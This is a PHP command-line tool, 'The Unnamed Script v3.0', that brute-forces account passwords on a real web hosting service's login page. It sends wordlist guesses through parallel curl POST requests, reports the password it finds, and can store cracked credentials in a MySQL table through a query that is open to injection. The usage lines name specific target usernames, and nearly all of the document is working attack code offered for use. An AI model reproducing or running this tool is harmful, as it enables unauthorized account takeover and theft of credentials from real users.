#!/usr/bin/php // // Usage: // /usr/bin/brute [input] [options] // // Parameters: // -h -- display help // -l -- path to wordlist // -u -- username to get into // -v -- sets verbosity to ON // -s -- number of curl sessions per iteration // **note: 10 is faster than 1, and 100 is slower than 1 // -db -- log to database // **Usage: -db dbhost dbuser dbpass dbname // // Usage: // /usr/bin/brute -l mil-dic.txt -u paradoxhacker -s 25 // /usr/bin/brute -l argon.txt -u ishkur88 -s 15 -v // /usr/bin/brute -l general.txt -u slyjakes -s 20 -db localhost hacker passwd logs // // WARNING: // Use this script at your discretion, be responsible, and have fun ;) /*-------------------------------------------------------------------------------------*/ /*---------------------------------*/ // Main Function, handles user input /*---------------------------------*/ function brute_force($argc, $argv) { $maxArgs = $argc - 1; $something = 0; $database = 0; $limit = 10; for($x = 1;$x<=$maxArgs||$x==1; ++$x) { switch($argv[$x]) { case "-h" : echo "The Unnamed Script v3.0\n". "by: GODD & Ishkur\n". "". "Usage:\n". $_SERVER['PHP_SELF']. " [input] [options]\n\n". "Parameters:\n". " -h -- display help\n". " -l -- path to wordlist\n". " -u -- username to get into\n". " -v -- sets verbosity to ON\n". " -s -- number of curl sessions per iteration\n". " **note: 10 is faster than 1, and 100 is slower than 1\n". " -db -- log to database\n". " **Usage: -db dbhost dbuser dbpass dbname\n\n". "Usage: \n". $_SERVER['PHP_SELF']. " -l mil-dic.txt -u paradoxhacker -s 25\n". $_SERVER['PHP_SELF']. " -l argon.txt -u ishkur88 -s 15 -v\n". $_SERVER['PHP_SELF']. " -l general.txt -u root -s 20 -db localhost hacker passwd logs\n\n". "WARNING:\n". "Use this script at your discretion, be responsible, and have fun ;)\n\n"; break; case "-l" : ++$x; $list = $argv[$x]; $something = 1; break; case "-u" : ++$x; $user = $argv[$x]; $something = 1; break; case "-v" : $verbosity = 1; $something = 1; break; case "-s" : ++$x; $limit = $argv[$x]; $something = 1; break; case "-db" : $database = 1; $dbhost = $argv[$x + 1]; $dbuser = $argv[$x + 2]; $dbpass = $argv[$x + 3]; $dbname = $argv[$x + 4]; $x+=4; break; default : echo "The Unnamed Script v3.0\n". "by: GODD & Ishkur\n". "\n\n". "Usage:\n". $_SERVER['PHP_SELF']. " [input] [options]\n\n". "Parameters:\n". " -h -- display help\n". " -l -- path to wordlist\n". " -u -- username to get into\n". " -v -- sets verbosity to ON\n". " -s -- number of curl sessions per iteration\n". " **note: 10 is faster than 1, and 100 is slower than 1\n". " -db -- log to database\n". " **Usage: -db dbhost dbuser dbpass dbname\n\n". "Usage: \n". $_SERVER['PHP_SELF']. " -l mil-dic.txt -u paradoxhacker -s 25\n". $_SERVER['PHP_SELF']. " -l argon.txt -u ishkur88 -s 15 -v\n". $_SERVER['PHP_SELF']. " -l general.txt -u root -s 20 -db localhost hacker passwd logs\n\n". "WARNING:\n". "Use this script at your discretion, be responsible, and have fun ;)\n\n"; } } if($verbosity&&$something) { $pw = verboseMode($list, $user, $limit); if($database&&$pw){ logToDatabase($dbhost, $dbuser, $dbpass, $dbname, $user, $pw); } } elseif($something) { $pw = notVerboseMode($list, $user, $limit); if($database&&$pw){ logToDatabase($dbhost, $dbuser, $dbpass, $dbname, $user, $pw); } } } /*----------------------------------------------------*/ // Database: // $query = 'CREATE TABLE accounts ( '. // 'ID INT NOT NULL AUTO_INCREMENT, '. // 'username VARCHAR(20) NOT NULL, '. // 'password VARCHAR(30) NOT NULL, '. // 'PRIMARY KEY(ID))'; /*----------------------------------------------------*/ /*---------------------------------------------*/ // Database calls, for logging results to MySQL /*---------------------------------------------*/ function logToDatabase($dbhost, $dbuser, $dbpass, $dbname, $user, $pw) { $conn = mysql_connect($dbhost, $dbuser, $dbpass) or die ('MySQL Error: Authentication Error'); mysql_select_db($dbname); $query = 'INSERT INTO accounts (username, password) VALUES ('.$user.', '.$pw.');'; mysql_query($query) or die ('MySQL Error: Data Error'); mysql_close($conn); } /*----------------------------------------------------------------*/ // Main Loop, handles allocation of data and curl sessions (Verbose) /*----------------------------------------------------------------*/ function verboseMode($list, $user, $limit) { $file = fopen($list, "r"); if ($file) { $count = 1; $match=0; $submit = 'Log Me In Now!'; $pw = null; $url = 'http://www.110mb.com/login.php'; $fields = "remember_me=1&submit=$submit&mode=login&user_name=$user&password="; $replace = array("\r","\n"); $with = array('',''); $mh = curl_multi_init(); for($x = 0; $x < $limit; $x++) { $ch[$x] = curl_init(); curl_setopt($ch[$x], CURLOPT_URL,$url); curl_setopt($ch[$x], CURLOPT_POST, 1); curl_setopt($ch[$x], CURLOPT_RETURNTRANSFER,1); } while ((!feof($file)) && $match==0) { for($x=0;$x<$limit;++$x) { $password[$x] = str_replace($replace,$with,fgets($file, 4096)); curl_setopt($ch[$x], CURLOPT_POSTFIELDS, $fields.$password[$x]); curl_multi_add_handle($mh,$ch[$x]); } $running = null; do { curl_multi_exec($mh,$running); } while ($running > 0); echo "> - - - - - - - - - - attempt #$count\n"; for($x=0;($x<$limit)&&!($match);++$x) { $result = curl_multi_getcontent($ch[$x]); if(preg_match("/\bincorrect\b/i",$result)){ flush(); echo $password[$x]." - invalid\n"; } else { $pw=$password[$x];$match=1;echo $result; } curl_multi_remove_handle($mh,$ch[$x]); } ++$count; } curl_multi_close($mh); fclose($file); } if ($match) { echo "\n# -- > Password is $pw < -- #\n\n"; } else { echo "Password was not found\n"; } return $pw; } /*--------------------------------------------------------------------*/ // Main Loop, handles allocation of data and curl sessions (Non-Verbose) /*--------------------------------------------------------------------*/ function notVerboseMode($list, $user, $limit) { $file = fopen($list, "r"); if ($file) { $match=0; $submit = 'Log Me In Now!'; $pw = null; $url = 'http://www.110mb.com/login.php'; $fields = "remember_me=1&submit=$submit&mode=login&user_name=$user&password="; $replace = array("\r","\n"); $with = array('',''); $mh = curl_multi_init(); for($x = 0; $x < $limit && !feof($file); $x++) { $ch[$x] = curl_init(); curl_setopt($ch[$x], CURLOPT_URL,$url); curl_setopt($ch[$x], CURLOPT_POST, 1); curl_setopt($ch[$x], CURLOPT_RETURNTRANSFER,1); } while ((!feof($file)) && $match==0) { for($x=0;$x<$limit;++$x) { $password[$x] = str_replace($replace,$with,fgets($file, 4096)); curl_setopt($ch[$x], CURLOPT_POSTFIELDS, $fields.$password[$x]); curl_multi_add_handle($mh,$ch[$x]); } $running = null; do{ curl_multi_exec($mh,$running); }while ($running > 0); for($x=0;($x<$limit)&&!($match);++$x) { $result = curl_multi_getcontent($ch[$x]); if(!preg_match("/\bincorrect\b/i",$result)){ $pw=$password[$x];$match=1;echo $result; } curl_multi_remove_handle($mh,$ch[$x]); } } curl_multi_close($mh); fclose($file); } if ($match) { echo "\n# -- > Password is $pw < -- #\n\n"; } else { echo "Password was not found\n"; } return $pw; } brute_force($argc, $argv); ?>